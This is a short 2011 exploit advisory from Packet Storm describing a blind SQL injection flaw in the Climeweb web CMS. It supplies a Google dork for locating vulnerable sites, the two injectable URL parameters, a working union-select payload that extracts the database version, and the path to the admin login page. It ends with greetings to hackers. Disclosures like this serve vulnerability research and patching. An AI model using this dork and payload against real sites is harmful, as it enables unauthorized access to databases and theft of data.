Climeweb Remote SQL Injection

2011-10-17T00:00:00
ID PACKETSTORM:105908
Type packetstorm
Reporter poach3r
Modified 2011-10-17T00:00:00

Description

                                        
                                            `==========================================================================  
  
# Exploit Title: Climeweb Blind SQL Injection Vulnerability  
# Date: 11.10.2011  
# Author: poach3r  
# Software Link: http://www.climeweb.com/  
# Tested on: Windows XP SP3  
# Google Dork: "Powered by Climeweb" inurl:"indux.php"  
  
==========================================================================  
  
# Exploit :  
  
http://127.0.0.1/path/indux.php?id=[SQL]  
  
http://127.0.0.1/path/newsdetails.php?News_Id=[SQL]  
  
# Demo :  
  
http://127.0.0.1/path/indux.php?id=-2+union+select+1,version(),3,4,5+admin--  
  
# Admin Page :  
  
http://127.0.0.1/path/admin/login.php  
  
==========================================================================  
  
# GreetZ To : All IRANIAN HackerZ  
  
./End  
`